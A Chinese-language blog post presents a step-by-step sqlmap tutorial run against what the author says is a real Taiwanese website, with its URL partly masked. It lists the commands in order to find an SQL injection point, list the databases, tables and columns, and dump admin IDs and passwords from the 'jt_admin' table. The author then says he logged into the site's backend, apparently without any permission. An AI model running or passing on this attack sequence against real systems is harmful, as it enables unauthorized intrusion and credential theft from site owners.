Finger
拎着烈酒背着孤独踟蹰的代码狗
0x0  写在前
今天给大家写一下运用sqlmap实战演示检测网站,下面网站url我会尽量缩写和打乱,但是这是一个真实存在的站点,只是不希望发出来大家去造成太大的破坏,而且本教程只是提供对sqlmap这个工具的认知以及最基础的使用,希望大家在做检测的时候不要做过激的行为,好了废话不多说。
0x1 事件经过

今晚某群一个人说他的w3af不能正常使用,因为他已经知道这个站存在注入点但是用工具却扫不出来,后来我就问他要了这个网站做了初级的检测后发现存在sql注入点,url: http://www.poxxxcom.tw/pron.php ... %20%2715%27%3D%2715,一个台湾的站点,接下来就开始今天的主讲。

0x2 Sqlmap注入点检测

打开sqlmap,先把url丢给sqlmap去跑,命令:

  1. sqlmap -u http://www.poxxcom.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%271

复制代码

结果如下图:

从图中我们可以看出,这个注入点提交的类型是get型,数据库为Mysql5.0.11,系统是Linux CentOS5.8,服务器版本是Apache2.2.3,确定这个注入点可行,接下来我们试试列出它的数据库。

0x3 Sqlmap列数据库
命令:

  1. sqlmap -u http://www.poxxcom.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%2715 --dbs

复制代码

检测结果如下:

已经列出4个数据库,这里我们列第三个,因为他是网站名称。

0x4 Sqlmap查询指定数据库中的表单
命令:

  1. sqlmap -u http://www.poxxcom.tw/prn.php?cid=15%27%20OR%20%2715%27%3D%2715 --tables -D "poxxx_db"

复制代码

检测结果如下图:

0x5 Sqlmap查询指定表单内的字段
命令:

  1. sqlmap -u http://www.poxxcom.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%2715 --columns -T "jt_admin" -D "poxxx_d"

复制代码

检测结果如下图:

0x6 Sqlmap查询指定字段内的内容
命令:

  1. sqlmap -u http://www.poxxx.com.tw/pron.php?cid=15%27%20OR%20%2715%27%3D%2715 --dump -C "ID,password" -T "jt_admin" -D "proxxx_db"

复制代码

扫描结果如下:

0x7 最后
写这篇实战,让大家更了解和清楚的明白sqlmap这个工具的基础命令,这篇文章记录的时间也是可以看到的,洗澡吃饭都丢在那里检测的,还是那句话一切为了学习,希望大家在使用的过程中懂得把握得当,这篇教程只到这里,后台已经登录后退出。end

这篇文章还没有人发言,快抢第一!

发表评论